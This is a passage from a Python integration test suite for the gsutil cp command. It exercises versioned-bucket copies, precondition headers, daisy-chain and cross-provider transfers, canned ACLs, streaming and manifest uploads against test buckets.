suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
# 1 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
# Specifiying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
# TODO: Add ordering assertion (should be in stderr.split('\n)[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
# Final (most recent) object should match the "Created:" URI. This is
# in second-to-last line (last line is '\n').
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28 # Up to 256 MiB in size.
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
# presereved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
# removes the x-goog-if-generation-match:0 header that was set at uploading
# time when updating the ACL.
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
# two from the upload thread (expection message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
def test_copy_duplicate_nested_object_names_to_new_cloud_dir(self):
"""Tests copying from bucket to same bucket preserves file structure."""
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir1/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir2/file.txt',
contents=b'data')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(
['cp', '-R',
suri(bucket_uri) + '/*',
suri(bucket_uri) + '/dst'])
stdout = self.RunGsUtil(['ls', '-R', bucket_uri.uri], return_stdout=True)
self.assertIn(suri(bucket_uri) + '/dst/dir1/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/dir2/file.txt', stdout)
_CopyAndCheck()
def test_copy_duplicate_nested_object_names_to_existing_cloud_dir(self):
"""Tests copying from bucket to same bucket preserves file structure."""
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir1/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir2/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dst/existing_file.txt',
contents=b'data')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(
['cp', '-R',
suri(bucket_uri) + '/*',
suri(bucket_uri) + '/dst'])
stdout = self.RunGsUtil(['ls', '-R', bucket_uri.uri], return_stdout=True)
self.assertIn(suri(bucket_uri) + '/dst/dir1/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/dir2/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/existing_file.txt', stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
destination objects named by the version- specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
Regions like us-east2 accept only V4 signature, hence we will create
the bucket in us-east2 region to enforce testing with V4 signature.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_copy_quiet(self):
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
Note that while this does perform a file to object upload, MD5's are
not supported for composite objects so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
# For Python 2 compatability.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
